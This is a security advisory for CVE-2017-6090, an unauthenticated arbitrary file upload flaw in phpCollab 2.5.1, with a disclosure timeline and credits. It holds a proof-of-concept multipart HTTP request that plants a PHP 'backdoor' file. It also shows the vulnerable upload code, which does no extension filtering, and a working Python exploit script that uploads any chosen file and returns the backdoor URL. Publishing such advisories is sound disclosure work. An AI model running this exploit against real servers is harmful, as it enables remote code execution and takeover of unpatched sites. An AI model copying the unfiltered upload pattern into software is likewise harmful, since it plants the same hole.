phpCollab 2.5.1 - Arbitrary File Upload

2017-10-02 18:05:04

# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)

## Description

PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.

## Arbitrary File Upload

The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.

**CVE ID**: CVE-2017-6090

**Access Vector**: remote

**Security Risk**: Critical

**Vulnerability**: CWE-434

**CVSS Base Score**: 10 (Critical)

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

### Proof of Concept

The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.

For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.

```
POST /clients/editclient.php?id=1&action=update HTTP/1.1
Host: phpCollab.lan
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
Content-Length: 252

-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Type: application/x-php

<?php phpinfo(); ?>

-----------------------------154934846911423734231554128137--
```


### Vulnerable code

The vulnerable code is found in `clients/editclient.php`, line 63.

```
$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
{
chmod("../logos_clients/".$id.".$extension",0666);
$tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
connectSql("$tmpquery");
}
```


### Exploit code

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os
import sys
import requests

if __name__ == '__main__':
if (len(sys.argv) != 4):
print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
sys.exit(1)

target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
print("[*] Trying to exploit with URL : %s..." % target)
backdoor = {'upload': open(sys.argv[3], 'rb')}
r = requests.post(target, files=backdoor)
extension = os.path.splitext(sys.argv[3])[1]
link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
r = requests.get(link)
if r.status_code == 200:
print("[OK] Backdoor link : %s" % link)
else:
print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
```

## Solution

Update to the latest version avalaible.

## Affected versions

* Version <= 2.5.1

## Timeline (dd/mm/yyyy)

* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.

## Credits

* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)

--
SYSDREAM Labs <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="0b676a69784b7872786f796e6a6625686466">[email protected]</a>>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream <script>!function(e,t,r,n,c,a,l){function i(t,r){return r=e.createElement('div'),r.innerHTML='<a href="'+t.replace(/"/g,'"')+'"></a>',r.childNodes[0].getAttribute('href')}function o(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return i(r)}try{for(c=e.getElementsByTagName('a'),l='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(a=c[n]).href.indexOf(l))>-1&&(a.href='mailto:'+o(a.href,t+l.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(a=c[n]).parentNode.replaceChild(e.createTextNode(o(a.getAttribute('data-cfemail'),0)),a)}catch(e){}}catch(e){}}(document);</script>

Fixes

No fixes

In order to submit a new fix you need to be registered.